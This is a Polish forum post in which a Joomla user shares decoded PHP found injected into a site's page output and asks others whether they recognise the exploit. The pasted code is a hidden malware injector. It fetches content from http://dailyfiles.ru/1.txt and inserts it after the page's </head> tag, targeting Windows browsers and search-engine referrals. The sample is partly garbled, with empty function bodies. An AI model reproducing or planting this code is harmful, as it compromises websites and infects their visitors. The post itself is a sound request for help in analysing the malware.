$JResp = str_ireplace("</head>", "</head>".$code, $JResp);
Nie bawię się joomlą na co dzień, ale taki kod od razu włącza alarm w mojej głowie - odkodowałem eval'owany kod. Wklejam go poniżej. Spotkał się już ktoś z Was z takim exploitem?
$url = 'http://dailyfiles.ru/1.txt'; $mode = 1;//1 čëč 2 //Çŕďđîń ę íŕřĺěó őîńňó_ function geturl_1($url) { } //Çŕďđîń ę íŕřĺěó őîńňó_2 \ Ńîęĺňű function geturl_2( $sock,$host, $path, $query ) { "Host: $host\r\n" . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\r\n" . "Accept: */*\r\n" . "Accept-Language: en-us,en;q=0.5\r\n" . "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" . "Keep-Alive: 300\r\n" . "Connection: keep-alive\r\n" . "Referer: http://$host\r\n\r\n"); { $response .= $line; } return $response; } //Çŕďđîń ę íŕřĺěó őîńňó_3 \ Ęóđëű function geturl_3($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); curl_close($ch); return $result; } function is_good_ua($useragent) { if( stripos($useragent, 'opera')!==false || stripos($useragent, 'Firefox') || stripos($useragent, 'MSIE')) { return 1; } return 0; } function is_windows_ua($useragent) { if(stripos($useragent, 'windows')) { return 1; } return 0; } function mainwork($url) { { } else { { } elseif( @function_exists('curl_init') ) { } } } $ua = @$_SERVER['HTTP_USER_AGENT']; if(is_windows_ua($ua)) { if ($mode == 1) { if (is_good_ua($ua)) { mainwork($url); } } elseif ($mode == 2) { { $referer = $_SERVER['HTTP_REFERER']; if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { { mainwork($url); } } } } }